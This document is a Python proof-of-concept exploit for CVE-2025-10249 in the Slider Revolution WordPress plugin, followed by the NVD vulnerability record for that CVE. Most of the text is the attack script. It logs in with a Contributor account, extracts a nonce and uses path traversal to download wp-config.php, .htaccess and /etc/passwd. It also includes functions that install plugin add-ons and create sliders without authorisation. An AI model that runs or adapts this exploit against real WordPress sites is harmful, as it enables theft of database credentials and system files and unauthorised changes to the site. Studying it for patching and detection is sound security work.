CVE-2025-10249

# CVE-2025-10249 PoC - Slider Revolution Missing Capability Check # Exploits missing capability checks in Slider Revolution plugin # Requires Contributor-level or above WordPress account import requests import re # Configuration TARGET_URL = "http://target-wordpress-site.com" USERNAME = "contributor_user" PASSWORD = "contributor_password" # Step 1: Login to WordPress as Contributor session = requests.Session() login_data = { "log": USERNAME, "pwd": PASSWORD, "wp-submit": "Log In", "redirect_to": f"{TARGET_URL}/wp-admin/", "testcookie": "1" } session.post(f"{TARGET_URL}/wp-login.php", data=login_data) # Step 2: Extract nonce from admin page admin_page = session.get(f"{TARGET_URL}/wp-admin/admin.php?page=revslider") nonce_match = re.search(r'nonce[":]\s*["\']([a-f0-9]+)["\']', admin_page.text) nonce = nonce_match.group(1) if nonce_match else "" # Step 3: Exploit arbitrary file download (missing capability check) # Download wp-config.php which contains DB credentials def download_file(target_file): """Exploit missing capability check to download arbitrary files""" params = { "action": "revslider_ajax_action", "client_action": "download_file", "file": target_file } response = session.get( f"{TARGET_URL}/wp-admin/admin-ajax.php", params=params ) return response.text # Step 4: Exploit - download sensitive files sensitive_files = [ "../../../../wp-config.php", "../../../../.htaccess", "../../../../../../../etc/passwd" ] for file_path in sensitive_files: print(f"[*] Attempting to download: {file_path}") content = download_file(file_path) if "DB_PASSWORD" in content or "root:" in content: print(f"[+] SUCCESS - File contents:\n{content[:500]}") break # Step 5: Exploit - Install/activate plugin add-ons def install_addon(addon_path): """Exploit missing capability check to install add-ons""" data = { "action": "revslider_ajax_action", "client_action": "install_plugin", "plugin_path": addon_path, "nonce": nonce } response = session.post( f"{TARGET_URL}/wp-admin/admin-ajax.php", data=data ) return response.json() # Step 6: Exploit - Create arbitrary slider def create_slider(slider_data): """Exploit missing capability check to create sliders""" data = { "action": "revslider_ajax_action", "client_action": "create_slider", "slider_data": slider_data, "nonce": nonce } response = session.post( f"{TARGET_URL}/wp-admin/admin-ajax.php", data=data ) return response.json()

{"cve": {"id": "CVE-2025-10249", "sourceIdentifier": "[email protected]", "published": "2025-10-09T12:15:34.873", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Slider Revolution plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on several functions in all versions up to, and including, 6.7.37. This makes it possible for authenticated attackers, with Contributor-level access and above, to install and activate plugin add-ons, create sliders, and download arbitrary files."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-23"}]}], "references": [{"url": "https://www.sliderrevolution.com/documentation/changelog/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/43f2c4e5-c19d-4b7c-849b-47052bb62cb5?source=cve", "source": "[email protected]"}]}}